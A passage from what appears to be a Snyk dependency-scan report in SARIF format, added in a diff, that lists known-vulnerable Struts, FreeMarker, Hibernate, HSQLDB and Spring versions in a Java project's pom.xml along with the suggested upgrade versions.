"SNYK-JAVA-ORGAPACHESTRUTS-30776", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.34" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.34" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.33" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.33" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.34" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.34" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.34" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.34" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.35" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.35" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5.31" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5.31" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-608098", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5.22" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5.22" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5.32" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5.32" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.24.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.24.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.28" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.28" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.28" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.28" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.24.3" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.24.3" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.20.3" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.20.3" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.20.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.20.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.24.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.24.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGFREEMARKER-1076795", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.freemarker:freemarker package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.freemarker:freemarker@2.3.19" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5.25" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5.25" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHIBERNATE-1041788", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.hibernate:hibernate-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hibernate:hibernate-core@4.3.7.Final" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHIBERNATE-584563", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.hibernate:hibernate-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hibernate:hibernate-core@4.3.7.Final" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHIBERNATE-30098", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.hibernate:hibernate-validator package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hibernate:hibernate-validator@4.3.1.Final" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHIBERNATE-568162", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.hibernate:hibernate-validator package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hibernate:hibernate-validator@4.3.1.Final" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHIBERNATE-569100", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.hibernate:hibernate-validator package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hibernate:hibernate-validator@4.3.1.Final" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHSQLDB-3040860", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.hsqldb:hsqldb package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hsqldb:hsqldb@2.3.2" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@4.3.29.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@4.3.29.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@3.2.9.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@3.2.9.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@3.2.14.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@3.2.14.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@3.2.15.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@3.2.15.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@3.2.8.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@3.2.8.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.3.32" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.3.32" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.3.33" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.3.33" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.3.34" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.3.34" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-core@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.2.18.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.2.18.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-core@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.2.19.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.2.19.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-core@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@3.2.9.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@3.2.9.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-expression package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-expression@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.0.0.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.0.0.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-expression package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-expression@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.0.0.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": 